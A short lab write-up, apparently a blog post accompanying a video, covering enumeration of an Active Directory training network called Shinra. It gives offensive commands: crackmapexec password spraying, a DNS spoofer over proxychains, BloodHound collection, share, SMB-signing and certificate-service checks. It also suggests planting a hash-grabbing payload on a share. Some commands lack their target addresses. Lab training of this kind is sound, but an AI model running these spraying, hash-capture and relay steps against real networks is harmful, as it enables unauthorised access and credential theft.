VL Shinra Part 2 – Enumerate, Enumerate, Enumerate!

VL Shinra Part 2 – Enumerate, Enumerate, Enumerate!

This is the second video of the Shinra series. Before setting foot onto any of the network’s internal machines, we are going to spend a bit of time enumerating various things from our machine.

Some ideas for further steps that are not shown in the video:

  • Spray “Shinra2022” or variations of it against all users in the domain.
  • Place a hash grabbing payload (e.g. https://github.com/xct/hashgrab) inside the workspace share and see if you can find any hashes.




tcpdump -i ens37 -s 0 -w - -U | tee output.pcap | tcpdump -r -

Credential spraying

crackmapexec smb -u user.txt -p pass.txt --no-bruteforce --continue-on-success


sudo sh -c 'proxychains python3 /home/xct/tools/dnschef/dnschef.py --fakeip --fakedomains shinra-dev.vl -q'

proxychains bloodhound-python -c all --disable-pooling -w 1 -u "william.davis" -p 'password' -d shinra-dev.vl -dc dc.shinra-dev.vl -ns


crackmapexec smb -u "william.davis" -p 'password' --shares

SMB Signing

crackmapexec smb --gen-relay-list relay.txt

Machine Account Quota

crackmapexec ldap -u "william.davis" -p 'password' -M maq


crackmapexec ldap -u "william.davis" -p 'password' -M adcs
crackmapexec ldap -u "william.davis" -p 'password' -M adcs -o SERVER=shinra-dev-CA
certipy find -u "william.davis" -p 'password' -dc-ip 

Share this post